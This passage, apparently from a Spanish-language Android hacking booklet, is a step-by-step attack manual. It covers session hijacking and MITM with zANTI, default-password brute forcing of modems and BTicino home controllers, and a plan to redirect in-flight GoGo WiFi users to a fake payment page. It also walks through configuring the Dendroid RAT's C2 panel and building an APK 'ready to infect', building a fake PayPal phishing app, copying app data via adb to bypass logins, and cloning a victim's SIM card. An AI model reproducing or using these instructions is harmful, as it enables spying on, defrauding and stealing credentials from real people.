  • 18. La herramienta tiene 2 opciones y es el sistema esta automatizado para indetificar aquellas paginas sobre “HTTP” se encuentra con 2 opciones solamente “START” y “STOP”. Aca hay un problema y es que los ataques MITM “Mitiga” cuando facebook establece su cifrado seguro de sesiones y implementa el “Https” dejando a ataques como MITM sin poder realizar la captura de sesiones por lo tanto este solo debie empezar a capturar sesiones sobres los problemas de certificados SSL y durante la web se encuentre en http. Para abrir una sesion solamente debemos es clickear sobre una y saldran 3 opciones y vamos la opcion de abrir pagina normal. Una vez ya deberiamos estar observando dentro de la aplicación la sesion:
  • 19. DroidSheep utiliza su programa nativo para capturar paquetes. Esta programa nativo utiliza libpcap, una biblioteca de acceso a la red proporcionada por el núcleo y por defecto incluido en cualquier distribución androide. DroidSheep utiliza estas funciones proporcionadas por libpcap: Nombre De Funcion: Descripcion: pcap_lookupdev función de búsqueda para la interfaz de red por defecto en el dispositivo. pcap_lookupnet d eterminar la dirección de red y la máscara de subred del dispositivo pcap_open_live escuchar paquetes recibidos por el dispositivo pcap_compile Compila una expresion de un filtro pcap_loop Inicia un bucle sin fin escucha de paquetes y llamadas método de devolución de llamada para cada paquete capturado pcap_freecode Desasigna la memoria para el compilado pcap_close Cierra de captura de la sesion
  • 20. 8 COMO UTILIZAR - ZANTI Zanti: Es una herramienta que pocos utilizan y los expertos de seguridad informática la utilizan a menudo en sus celulares con tecnología “Android” para detectar todo tipo de redes y robar contraseñas además de desafiar al servidor escaneando puertos y reconociendo dispositivos como “Impresoras” , “Celulares blackberry” , “Android” , “WindowPhone” , “Routers” y cualquier otra tecnología conectada a una red y con sus puertos abiertos facilitando al pirata realizar acciones que puedan perjudicar al usuario conectado a una misma red. Descargar Aplicacion: Zanti: tiene 2 opciones la premium y la free , obviamente para el usuario como tal pueden descargar la free por medio del vinculo: https://www.zimperium.com/zanti-mobile-penetration-testing donde deberán llenar datos como su dirección de correo electrónico y clickear en “Dowload”. Root En Android: El celular debe estar rooteado para darle los permisos necesarios que necesita la aplicación para utilizar nuestro celulares y empezar a auditar todo tipo de redes además de vulnerar otros dispositivos.
  • 21. DESPUES DEL ROOT: Ahora podemos utilizar “ZANTI” abrimos la aplicación “recuerda que debemos estar en una red WIFI, conectado” Una vez instalado zanti y ejecutado además de conectarnos a una red “WIFI” donde muchas personas estén conectadas en este momento sean ordenadores o celulares, nos muestra una lista de direcciones IPS asignadas además de su dirección “MAC” , además podemos visualizar los “Logos” o “Icons” de cada dispositivo donde encontramos laptops y celulares conectados a continuacion..
  • 22. VISUALIZANDO UNA VICTIMA: •Clickeamos en nuestra primera victima y se trata de un “Modem” en que estamos conectados por la dirección por defecto de configuración podría ser la “192.168.0.1 o 192.168.1.1” pero el problema general serian los puertos podemos realizar una fuerza bruta para buscar los puertos en caso que el puerto “80” que nos permite visualizar por medio de una plataforma web este desactivado posiblemente tenga el puerto “443” que también nos permitiría visualizarlo entonces la herramienta nos ayudaría a buscar esos puertos, en la opcion “Password Complexity Audit”. BUSCAR EL PUERTO PERFECTO: Dejamos el “Automatic Mode” en “ON” y dejamos el cracking method en “Small Dictionary” y luego presionamos en “GO”.
  • 23. VER LOS PUERTOS Y CONTRASEÑAS POR DEFECTO: Ahora que nos muestra los puertos sabemos 3 tipos de conexiones seguras pero posiblemente “Protegidas por una contraseña por defecto o modificada”, ahora por medio del puerto “21” significa manipulación de logs o ficheros del modem, por el puerto 23 conexión al menu y configuración del modem, y por medio del puerto 80 y 443 podría ser que el modem este protegido o quizás no, la herramienta también tiene una capacidad de realizar un ataque de fuerza bruta para descifrar la contraseña por defecto. ACCEDIENDO POR DEFECTO: Las contraseñas por defecto de un modem podrían ser una vez conectado a la red puerto 80 podría lanzarnos 2 tipos de autentificación 1) Www-authenticate 2) formulario de “Usuario y Contraseña” simple. Contraseñas por defecto: admin:password admin:Sin_Contraseña admin:admin user:12345 admin:123456 admin:123 administrador:123456 TIPO DE AUTENTIFICACION: “2002 OK” > se carga sin ninguna autenticación. “401 Unauthorized”> pancartas con WWW Authenticate indicar un nombre de usuario y
  • 24. contraseña La autenticación es posible, pero aún no se logra, a diferencia de "403 Forbidden” ,Algunas banners anuncian por defecto. AVISO DE CONTRASEÑAS AL PUBLICO MEDIANTE UN HTTP TRACER: •Este caso se ve mucho y es que cuando nos conectamos a una dirección IP de un modem o producto o router nos lanza la contraseña por defecto sin tener que estar aplicando la fuerza bruta con “ZANTI”, password:1234 y como usuario ninguno. ATAQUE MITM: Es un ataque en el que se adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas. Ataque Man-in-the-middle Con Zanti
  • 25. Zanti tiene una opción de ataque main in the middle que permite que tu veas las sesiones que tiene tu victima en facebook, twitter o yahho amazon ect. 9 COMO UN HACKER PUEDE VINCULAR PHISHING CON ZANTI EL TEMA DE QUE HABLAMOS ES LA PROVEEDORA DE INTERNET "GoGo - WIFI" UNA EMPRESA YA INSTALADA EN DIFERENTES AEREOLINEAS YA HABLAMOS ANTERIORMENTE EN OTRO DE MIS BLOGS DE "KELVINSECTEAM" EN QUE EXPLICA VAMOS QUE TAMBIÉN PUEDE SER UTILIZADO PARA FINES TERRORISTAS INVOLUCRANDO A OTROS CIUDADANOS CONECTADOS A UNA MISMA RED. TAMBIÉN HE VISTO OTRO VIDEO LLAMADO "WIFI-GOGO HACK" DONDE UNA PERSONA SEGÚN EL O ELLA HA DESCUBIERTO UNA MENERA DE BYPASSEAR "SALTEARSE" LA PETICIÓN DE CREDENCIALES O MAS BIEN EL "PAGO EN LINEA DESDE LA WEB GOGO". Mapa De técnica: 1 - (abrir zanti) => 2 - (Opcion De Redireccion) =>
  • 26. 3- (ingresar ejemplo: www.tuphishinpayment.com) 4- (cualquier usuario conectado a la red wifi será redireccionado al phishing al abrir su navegador en su mobil o Tablet) MUY BIEN UNA VEZ MONTADOS EN EL AVION VAMOS A BUSCA UNA RED "WIFI" NOS ENCONTRAMOS CON LA DE GOGO SE ENCUENTRA LIBERADA PERO TIENE RESTRICCION DE NAVEGACION UNA DE LAS COSAS QUE QUIERO DECIR ES QUE NO HE TENIDO LA OPORTUNIDAD PARA YO "AUDITAR" EN VIVO Y EN PERSONA A "GoGo" EN UNA AEREOLINEA COMO ES AMERICAN AIRLINE. BIEN EL PROBLEMA DE SEGURIDAD PODRÍA SER EL SIGUIENTE: 1) AL PESAR QUE NO TENEMOS FORMA ALGUNA DE NAVEGAR NOS ENCONTRAMOS CONECTADOS. 2) PODEMOS USAR UN ATAQUE "MAIN IN THE MIDDLE" Y ROBAR CREDENCIALES DE PERSONAS QUE VIAJAN ATRAVES DEL MISMO AVION. 3) POSIBLEMENTE EXISTEN UN MÉTODO DE CREAR UN "FALSO PAYMENT" UN FALSO SISTEMA DE PAGO CREAR UN SCAM DESDE NUESTRO ORDENADO LUEGO SUBIRLO A UN SERVIDO Y UTILIZAR UNA HERRAMIENTA AUTOMATIZADA COMO "ZANTI" PARA REDIRIGIR TODO USUARIO EN EL AVION CONECTADOS A LA RED WIFI A UN FALSO VINCULO DE PAGO DE LA AEREOLINEA Y GOGO.
  • 27. --- EL CATALOGO DE PAGO POR SERVICIO -- ESA ES LA RESTRICCIÓN DE NAVEGACIÓN A OTRAS DIRECCIONES URL. PROBLEMAS 1) NO PUEDES NAVEGAR POR OTRAS DIRECCIONES PERO SI TE POPORCIONA INTERNET 2) TE EMITE MÉTODOS DE PAGO PARA VER PELÍCULAS EN LINEA VENTAJA: PUEDES REALIZAR EL ATAQUE MITM SIN POBLEMAS UNO DE LOS PROBLEMAS DE GOGO SU PAGINA NO TIENE HTTPS ES DECIR NO SE PROTEGE POR UN CANAL SEGURO CIFRADO POR LO TANTO EL HTTP TE HACE MAS VULNERABLE A CUALQUIER VULNERABILIDAD.
  • 28. UNA DE LAS DESVENTAJAS ES QUE LA MAYORIA DE LA PAGINA YA ESTAN UTILIZAN EL "HTTPS" Y POR LO TANTO NO SUELE SER TAN CASUAL LANZAR UN ATAQUE MITM EN QUE TE GESTIONE CREDENCIALES EMAIL - PASSWORD DE UNA PAGINA SOCIAL COMO FACEBOOK O TWITTER O GMAIL. OFREZCO LA HERRAMIENTA "ZANTI" PARA ANDROID DONDE PUEDES REALIZAR UN ATAQUE MITM ADEMAS DE OTRAS OPCIONES. SI TE LO BAJAS EN TU TABLET PUEDES ACTIVAR EL MITM EN ESTA OPCION DE ESTA HERRAMIENTA ROBA CREDENCIALES DE CIERTAS PAGINAS DE CUALQUIER TIPO DE DISPOSITIVO CONECTADO A LA RED: - FACEBOOK - TWITTER - AMAZON - GMAIL - INSTAGRAM ECT.. MAS ABAJO TENEMOS EL REDIRECT HTTP ES EL QUE NOS CONVENZE MAS YA QUE RECUERDA QUE LA PAGINA PRINCIPAL: http://www.gogoair.com SE ENCUENTRA HTTP Y ESO NOS HACE LA FACILIDAD DE CREAR UN SCAM LUEGO SUBIR A UN SERVIDOR Y LUEGO UTILIZAR LA HERRAMIENTA DE ABAJO LLAMADA REDIRECCT HTTP Y INCLUIR NUESTRA DIRECCION DE SCAM Y LLEVANDO A NUESTRAS VICTIMAS A UN VINCULO FALSOS PARA CAPTURAR LAS CREDENCIALES DE TARJETAS DE CREDITO.
  • 29. 10VIRUS Y TROYANOS ANDROID En realidad la mayoria son troyanos y cumplen algunos la funcion de infectar tu sistema operativo android de tu celular o tablet con la finalidad de espiar y capturar contraseñas que son enviadas a un servidor y este servidor a un cliente el cual es el atacante. Android Malware: DROIDDREAM Catacteristicas: 1) utiliza root exploits 2) varia entre mas de 50 apps en la tienda 3) instala aplicaciones segundarias Spitmo - zeus Caracteristicas: 1) Funcion Virus bancario
  • 30. Obad - Troyano Caracteristicas: 1) Utiliza 3 exploits 2) Una backdoor 3) Envia Mensajes Troyanizados Dendroid -- Troyano Caracteristicas: 1) Infecta A dispositvos por medio de 1 aplicación generada 2) Puede ser manupulado por medio de un servidor con plataforma administrativa. 3) Graba Audio y Video del dispositivo. Funciones De Troyanos: 1) GPS 2) Grabaciones de audios 3) Mensajeria y Trafico de correo electronico 4) Visualizacion de fotografias 5) Registro de llamadas Pero no existen solo troyanos con fines malignos o comerciales en sentido del blackhat hacking tambien existen otros que en sus portales webs han publicado que estas aplicaciones serian una ayud para para proteger a sus hijos y monitorear empleados.
  • 31. Y que nos ofrece: En el panel administrtivo para aclarar las funciones:
  • 32. 11COMIENZOS CON DENDROID Introduccion: DENDROID es una herramineta que funciona con fines de espionaje que se utiliza para infectar a dispositivos android este suele tener una guia de instalacion ademas tambien se encunetra libre el codigo para ser modificado e instalado. Funciones que cumple DENDROID: 1) Almacena el historial de llamadas del dispositvo infectado 2) Envia mensajes y borra mensajes de la victima 3) Visible la lista de contactos del mobil infectado 4) Graba Audios Y Video 5) Tiene la capacidad de enviar mensajes a todos los contactos 6) Tiene un modo de interceptacion 7) Visualiza los mensajes que llegan y se envian
  • 33. Requisitos: 1) Disponer de un servidor preferiblemente acceso al Cpanel donde podras interactuar con el “phpmyadmin” “mysql” y Almacenar los ficheros de DENDROID en php. 2) JAVA SDK para la modificacion del codigo java de DENDROID Instrucciones de descarga: 1) Vamos al sitio de github donde se encuentra totalmente liberada: https://github.com/nyx0/Dendroid y donde clone or dowload presionamos y clickeamos en DOWLOAD ZIP.
  • 34. Ahora visualizaremos lo que hemos descomprimido del ZIP: En total son 3 carpetas y la que instalaremos en nuestro servidor web es Dendroid Panel alli se encuentra los scripts PHP. Ahora como podras observar entramos a la carpeta y ahora te dire cual carpeta esta los script PHp y estna en “PANEL” y en “Other Files” se encuentra el fichero .sql que importaremos en PHPMYADMIN.
  • 35. Bien ahora vamos a ver lo que la carpeta panel nos tiene Y vamos a editar las siguientes estas las agregaremos los datos de la base de datos que vamos ha crear y modificar las direcciones URLs. applysettings.php blockbot.php clearawaiting.php clearmessages.php deletebot.php deletefile.php deletepics.php functions.php table.php
  • 36. bien ahora aparecera esta direccion en algunos ficheros: Si tenemos el dominio “pizzachip.com” que es un ejemplo que viene por defecto en los ficheros tendiramos que cambiarlo por la direccion de nuestro servidor exactamente donde hemos subidos los ficheros. Podificamos el $url = www.pizzachip.com”; por $url =”www.tuweb.com”; bien agregas la direccion web donde has sibido los ficheros. Ahora vamos a modificar en otro lugar de algun fichero en PHP el keylimepie eso dira en los ficheros siguientes: get.php get-functions.php new-upload.php upload-pictures.php lo cual cuando diga “keylimepie” a “password”.  Saldra esa misma forma “keylimepie” lo cual modificaremos por “password”.
  • 37. Esto fue algo de lo que modificamos pero aun asi falta crear una base de datos y en esa base de datos un usuario para ingresarlo en en los codigos en “PHP” que tenemos para luego de esa forma establecer una conexión MySQL entre la base de datos y los PHP scripts que hemos ingresados. 1) Ahora vamos a Cpanel 2) Luego iremos a craer una base de datos y nos aparecera algo asi todo depende del tipo de estilo o version de cpanel: - Antes que todo crear la base de datos primera mente y luego crear el usuario para la base de datos- - Ahora creamos un usuario para la base de datos-
  • 38. Una vez de haber creado el usuario le asignaremos los privillegios: Bien ahora el siguiente proceso es ir al “PHPMYADMIN” e importar la base de datos .SQL que se encuentra en la carpeta de “OTHER Files”
  • 39. Iremos a phpmyadmin escogemos una base de datos que hemos creado y seleccionamos ahora arriba en la parte superior derecha => nos dice IMPORTAR Clickeamos Alli y seleccionamos donde se encuentra el fichero y subimos el fichero luego se creara las tablas como la imagen que observamos en la imagen de arriba. Ahora cuidado! Por que creamos la base de datos y usuaro pero no hemos asignado a cada una de ellas a el script PHP te aconsejo revisar cada PHP y ver si dispone de lo siguiente: Como en el fichero config.php $dbhost='Aca Pondras El Servidor MYSQL'; $dbname='El nombre de la base de datos'; $dbuser='El usuario Asignado durante la creacion de la base de datos'; $dbpass='La contraseña tambien asignada durante la creacion de la base de datos'; bien revisamos cada fichero haber si encontramos los datos que presentamos y que es importante tener en cuenta estos datos para la conexión entre el script y la base de datos. Por ultimo deberas subir los ficheros en tu servidor ejemplo que el servidor que estes trabajando sea: www.android.com subiremos los ficheros en ese enlace utilizando el cliente de zimbra y una vez que lo subas ya estaria listo para entrar al “SETUP” en el cual asignaremos un usuario y contraseña:
  • 40. Ahora no que mas que decir que darle en begin setup Agregamos los valores de 10 en la parte <= izquierda en la derecha agregamos como esta en la imagen agregamos un usuario y contraseña y presionamos en el boton verda de la parte inferior derecha. Una vez ya habra sido completado el proceso.
  • 41. Luego finalizamos y entramos de nuevo en la parte principal y agregamos las credenciales de login: “usuario y contraseña como hemos escogido” Luego listo podemos entrar al panel administrativos de adminsitracion de troyanos.
  • 42. Configuracion del software: Bueno ahora para la configuracion en esta parte deberemos tener ECLIPSE y tambien SDK android. Abrimos eclipse:  File  Import ahora debemos especificar la carpeta de projecto que tenemos llamado Dendroid APK.
  • 43. Ahora especificamos que ya es un projecto existente. Hubicamos la carpeta y clickeamos en aceptar.
  • 44. De igual manera aca finalizando. Bueno ya una vez abierto el projecto en la parte <= izquierda observaremos los ficheros que podemos modificar:
  • 45. Bien de igualmanera podemos modificar los scripts a continuacion borraremos variables las variables se encuentra en DroidianService.java, dentro del paquete com.connect y en la carpeta src. Llamados: encodedURL, backupURL y encodedPassword El valor de las variables lo borramos y lo dejamos como la imagen a continuacion: Tambien observaremos lo siguiente y son encodedURL, backupURL y encodedPassword que se encuentran en bse64.
  • 46. Luego entramos a la pagin http://crypo.in.ua/tools/eng_base64c.php que es una herramienta para cifrar y decrifrar ahora nos tocara cifrar la direccion de nuestra pagina web donde subimos los ficheros e instalamos. Ahora presionamos en Encrypt:
  • 47. Ese String, es que tendremos que poner como valor a las variables encodedURL y backupURL. Para la variable encodedPassword repetiremos el mismo paso, pero esta vez deberemos de cifrar la contraseña que pusimos a la hora de crear nuestro panel de control (aquella que cambiamos el valor de keylimepie luego nos quedra como en la imagen de arriba. Ahora presionamos en file y “Export”.
  • 48. Ahora indicamos que quermeos la aplicación APK A continuacion damos en siguiente luego nos saldra lo siguiente:
  • 49. - Si ya tienes una contraseña presiona en “Create new keystore” luego en siguiente. Llenamos el formulario Para culminar seleccionamos una carpeta donde queremos guardar la APK:
  • 50. Y listo tendremos nuestra APK lista para infectar a dispositivos:
  • 51. 12APP INVENTOR CREANDO FAKE APP App inventor es un projecto de la universidad MIT para que sus estudiantes aprendan de crear aplicaciones de forma sencilla y lo mejor de ello es que te permite la descarga directa de la .apk. Lo que se quiere hacer acá es impulsar el método de crear un phishing y hacerlo ejecutable desde el dispositivo android normalmente la aplicación no mostrar la dirección “web” desde donde nos conectamos y es una ventaja.  App inventor => crear un “iframe” con el vinculo falso de la pagina “Phishing”  App Inventor => utilizar un falso logo de una web bancaria o cualquier otra payment Instrucción: 1) Vamos a app inventor 2 > http://ai2.appinventor.mit.edu/ Creamos un projecto
  • 52. Una vez ya podremos editar y agregar lo que tendrá nuestra aplicación: En la parte inferior => derecha encontraremos con Title: donde agregare ejemplo “paypal” que es el titulado donde dice screen 2 en la imagen que observas arriba. Ahora arrastraremos en la parte <= izquierda en el menu al llamado “WebViever” este lo arrastramos hasta la pantalla En la parte derecha superior colocamos estos 2 en full parent y mas abajo en “HomeUrl” colocamos la direccion de nuestro phishing de paypal.
  • 53. Ahora en componentes clicekamos en screen2. Y ahora vamos a agregar el logo: En esta parte subimos una imagen cualquiera de paypal. Una vez ya terminado todo esto podemos compilar la aplicación falsa de paypal nuestra victima ejecutara la aplicación y de inmediato le pedira las credenciales tal como especifica tu phishing. Presionamos en BUILD y generamos la App en APK y listo tu APK falsa de paypal.
  • 54. 13COMUNICACIÓN ANDROID CON DISPOSITIVOS DOMESTICOS Existen multiple aplicaciones que permiten tener control sobre distintos aparatos domesticos que pueden funcionar por una comunicación Wireless y muchos de ellos tambien pueden ser controlados por medio de un servidor con plataforma que podemos observar graficamente uno de los productos que conosco mas es Btcino durante las primeras pruebas de kelvinsecurity teniendo un remoto control sobre todo un hogar muchos clientes de esta empresa han notificado que algo extraño pasa en su hogar. Lo encontramos disponible para “Android” aunque su conexión via WIFI podria ser esta y no una conexión con peticion de credenciales como “User: Password:” como es la de btcino generalmente en un servidor con plataforma.
  • 55. _bien vamos con los detalles del producto automatizado: „La gestión de la iluminación , El accionamiento de persianas y/o cortinas eléctricas, ventiladores, aspiradores, etc _estadísticas de servidor: HTTP/1.1 302 Found Date: Sat, 23 Jul 2016 15:14:35 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/1.0.0d PHP/5.1.6 X-Powered-By: PHP/5.1.6 location: /iden.php Content-Length: 0
  • 56. Content-Type: text/html Infraestructura: POR   MEDIO   DEL   TOUCH   EL   OPERADOR   PODRÁ   REALIZAR   LAS   MISMAS ACCIONES QUE REALIZARA UN HACKER POR MEDIO DE UN SERVIDOR. HACKER AUDITANDO EL SISTEMA: 1) RESPECTO AL SERVIDOR   SU ENTRADA A LA PLATAFORMA DONDE NOS PIDE LAS CREDENCIALES POR MEDIO DEL PUERTO 80 SI HACEMOS UN URL FUZZ VEREMOS QUE NO NOS PROPORCIONARA INFORMACION CLARO NOS LANZARA UNOS CUANTOS DIRECTORIOS "INDEX OF" DONDE ESTA VINCULADO EL CONFIG ­ INSTALL ECT PERO NINGUN FORMATO SERA VISUALIZADO.
  • 57. 2)   LAS   CREDENCIALES   SUELEN   SER   MUY   SENCILLAS   TE   TRAEMOS   UN LISTADO DE CONTRASEÑAS DEBILES Y CREEMOS QUE SON LAS MISMA QUE SE LE AGREGAN A BTICINO EN SU VERSION ANTIGUA. >USER:USER   >USER:123456  >ADMIN:ADMIN >ROOT­123456 DIRECTORIOS: Directories HTTP Code HTTP Reason /javascript/ 200 OK /lib/ 200 OK /styles/ 200 OK /language/ 200 OK /img/ 200 OK /cgi­bin/ 403 Forbidden
  • 58. ­­ SISTEMA DE CONTROL ­­ shodan:  location: iden.php PROBLEMA PRINCIPAL Y VENTAJAS DE UN PIRATA: 1) LA CONTRASEÑA DE FABRICA POR DEFECTO ES ADMIN:ADMIN ENTONCES AUNQUE   SE   LE   AGREGUE   UNA   CONTRASEÑA   ASIGNADA   LA   ADMIN;ADMIN SERA APROBADA COMO USUARIO CON PRIVILEGIOS. 2) CUALQUIERA QUE ENTRE A ESTE SISTEMA PODRIA TENER CONTROL DE EL HOGAR   E   INCLUSO   LLAMADAS   DE   ESPERA   TAMBIEN   LA   ILUMINACION PERSIANAS COMO LO HEMOS DICHO.
  • 59. ESA   FUE   LA   CONTRASEÑA   Y   AUN   ASI   ENTRAMOS   CON   "ADMIN:ADMIN" SALTEANDO   LA   ASIGNADA   Y   ESTO   FUNCIONA   SOLO   PARA   VERSIONES ANTIGUAS DE BTICINO.
  • 60. 14CONTROLAR VEHICULO DESDE TU CELULAR CON OBDLINK LX BLUETOOTH Ahora podemos controlar un auto con ayuda de OBD el cual es un producto valorado en 79$ dolares en amazon cuenta con una aplicación personalizada para iOS. https://www.amazon.com/gp/product/B00H9S71LW/ref=as_li_tl? ie=UTF8&camp=1789&creative=390957&creativeASIN=B00H9S71LW&linkCode=as2&tag=thedr oideffec-20 una de las cosas que traemos con el hacking en este producto es que nosotros teniendo lo siguiente: 1) Un ceular android 2) La aplicación OBDLink
  • 61. 3) Conexión via Bluetooth “con esto bastaria para scannear y buscar el dispositivo y conectarnos. Ahora un ejemplo de la busqueda de la conexión de nuestro celular buscando un punto en comunicación via Bluetooth con el dispositivo en nuestro auto o en el autro de nuestra victima: Y activado observaremos un punto de conexión cercano con el auto: Abrimos la aplicación y preisonamos en conectar: Presionamos en conectar y establecemos conexión con el dispositivo al hardware instalado al vehiculo por medio de una conexión Bluetooth.
  • 62. - Mapa grafico explicativo - Si no lo hemos dicho tambien existe una conexión entre la aplicación a un red wifi y lo puedes hacer sencillamente desde la aplicación y tendras el mismo remoto control del vehiculo y visualizacion de estado de este. Al pesar de los problemas de conexión WiFi a un individuo con la aplicación y que camine por la calle y se encuentre con esta red WiFi protegida por WPA2 todos los dispositivos utilizan una misma contraseña:
  • 63. Observamos en el hardware donde dice la contraseña de esta red: 15ATACAR APLICACIONES ANDROID CON “DATA-CLONE- ATTACK” METODO Un 0day investiado por SuperHei lo llamo “Data-clone-Attack” se puede omitir la autenticación de contraseña, cuando el usuario de inicio de sesión de la aplicación y ajuste "recordar contraseña" algunas aplicaciones es definir. Procedimiento De Ensayo: 1. abierto dos emulador. > adb devices Lista de dispositivos conectados
  • 64. dispositivo emulador-5554 dispositivo emulador-5556 ambos dispositivos se instalan (https://play.google.com/store/search?q=com.tencent.mobileqq&c=apps),Ofcourse, también se pueden utilizar otras aplicaciones para probar. 2) iniciar sesión en la aplicación "emulador-5554" y asegúrese de elegir el "recordar contraseña". a continuación, tire de los datos de la aplicación en el PC. Vamos a la terminal de nuevo: escribimos: >adb -s emulator-5554 pull /data/data/com.tencent.mobileqq/ d:aab pull: building file list...
  • 65. 3) empujar los datos a "emulador-5556" >adb -s emulator-5556 push D:aab /data/data/com.tencent.mobileqq/ 4) -adb shell "emulador-5556" >adb -s emulator-5556 shell # ls -l /data/data/ ls -l /data/data/ drwxr-x--x app_1 app_1 2012-09-24 02:43 com.android.htmlviewer drwxr-x--x app_35 app_35 2012-12-06 07:17 com.tencent.mobileqq y obtener el propietario com.tencent.mobile qq es "app_35". Debido a que los datos de empuje es root.
  • 66. # ls -l /data/data/com.tencent.mobileqq ls -l /data/data/com.tencent.mobileqq drwxrwxr-x root root 2012-12-06 07:17 shared_prefs drwxrwxr-x root root 2012-12-06 07:16 databases drwxrwx--x app_35 app_35 2012-12-06 07:10 cache drwxrwx--x app_35 app_35 2012-12-06 07:16 files drwxr-xr-x system system 2012-12-06 07:17 lib por lo que necesitamos a chown: # cd /data/data/com.tencent.mobileqq cd /data/data/com.tencent.mobileqq # chown app_35 * chown app_35 * # ls -l ls -l drwxrwxr-x app_35 root 2012-12-06 07:17 shared_prefs drwxrwxr-x app_35 root 2012-12-06 07:16 databases drwxrwx--x app_35 app_35 2012-12-06 07:10 cache drwxrwx--x app_35 app_35 2012-12-06 07:16 files drwxr-xr-x app_35 system 2012-12-06 07:17 lib pluma de la aplicación en "emulador-5556", y tienen ingrese en el qq com.tencent.mobile en "emulador-5556". Cómo obtener el contenido de los datos: es clave para la realización del ataque. algunos como esto: Ya tiene privilegios de super bajo el intérprete de comandos como la demo, u puede eludir la autenticación de contraseña utilizada "Data-Clone Attack". (Cross-site-scriptin en Android) app + webview + xss(or webkit xcs vul) = "Data-Clone"
  • 67. En la versión anterior de Android, aplicaciones o XSS webkit androide xcs vul puede leer el contenido del archivo local de: http://www.80vul.com/android/android-0days.txt Ventaja: Así vista web de la aplicación tiene los permisos de archivos de lectura a los datos de la aplicación. cuando un usuario de la aplicación visite un enlace URL, se pueden clonar los datos. 16CLONANDO SIM EL SIM DE TU VICTIMA Ha sido un trabajo para el area de delitos informaticos en multiples sedes de todo el mundo donde los agentes policiales del equipo de delitos informaticos aplican las tecnicas forenses
  • 68. informaticas pero todo con la finalidad de recolectar informacion en los siguientes componentes del hardware: 1) SIM 2) SD 3) Unidades Flash 4) Memoria Interna y secundaria. SIM :tiene un algoritmo para autentificar al subcriptor en la red y el numero de telefono. Acceso SIM: 1) El acceso se realiza mediante una clave PIN 2) Cuando la SIM redcibe eneria, lo primero que solicita es el PIN que desbloquea el acceso logico al contenido de la tarjeta 3) Sin el pin de acceso logico a la tarjeta no es factible. es posible aunque no de forma predeterminada que la tarjeta no presente PIN. CLONANDO UNA SIM: HARDWARE:
  • 69. GRABADORA DE PIC TIPO LUDIPIPO GRABADORA EEPROM TARJETA CON MICROPROCESADOR DONDE GRABA. SE UTILIZA EN TARJETAS COOLWAFER SOFTWARE: SIM SCAN: PERMITE OBTENER LOS CODIGOS IMSI Y KI ICPRO: GRABA EL PIC WINEXPLORER: GRABA LA EEPROM ICCID:CIRCUITO INTEGRADO DE IDENTIFICACION IMSI:SUBSCRIBER IDENTIFICADOR QUE TIENE LA SIM COMO TAL: 1) MENSAJES RECIBIDOS 2) NUMEROS DE TELEFONOS 3) ULTIMAS LLAMADAS PROCESO DE CLONACION SIM:
  • 70. NECESITAMOS UN SIM CARD READER PARA INSERTAR LA SIM DE LA VICTIMA Y LO PODEMOS CONSEGUIR EN VENTA EN ALIBABA LO PUEDES CONSGUIR EN LA SIGUIENTE DIRECCION: HTTPS://WWW.ALIBABA.COM/SHOWROOM/SIM-CARD-READER-WRITER.HTML REQUERIMOS: 1) TARJETA SIM EN BLANCO 2) LECTOR DE TARJETA SIM 3) SOFTWARE PARA GENERAR EL CONTENIDO DE SIM EN BLANCO PROCESO: 1) QUITAR LA SIM DE SU TELÉFONO, LO COLOCA EN EL LECTOR DE TARJETAS SIM LEER EL CÓDIGO DE KI Y EL IMSI LEER LA TARJETA SIM PARA KI Y EL IMSI UTILIZANDO EL SOFTWARE LA ESCRITURA EN LA TARJETA EN BLANCO 1) PONER LA TARJETA EN BLANCO EN EL LECTOR 2) SELECCIONE ESCRITURA PARA SIM 3) SELECCIONAR EL ARCHIVO .DAT A AHORRAR ANTES 4) SE LLEVARÁ UNOS 10 MINUTOS PARA ESCRIBIR
  • 71. FINALIZANDO : “SU TARJETA ES CLONADA” SI INTENTA HACER 2 LLAMADAS AL MISMO TIEMPO, UNO VA A IR A TRAVÉS DE, EL OTRO DIRÁ LLAMADA FALLA, Y AMBOS LOS TELÉFONOS TENDRÁN LOS MISMOS MENSAJES, TEXTO Y VOZ, Y AMBOS RECIBIRÁN LAS MISMAS LLAMADAS, PERO SÓLO UNO PUEDE HABLAR A LA VEZ.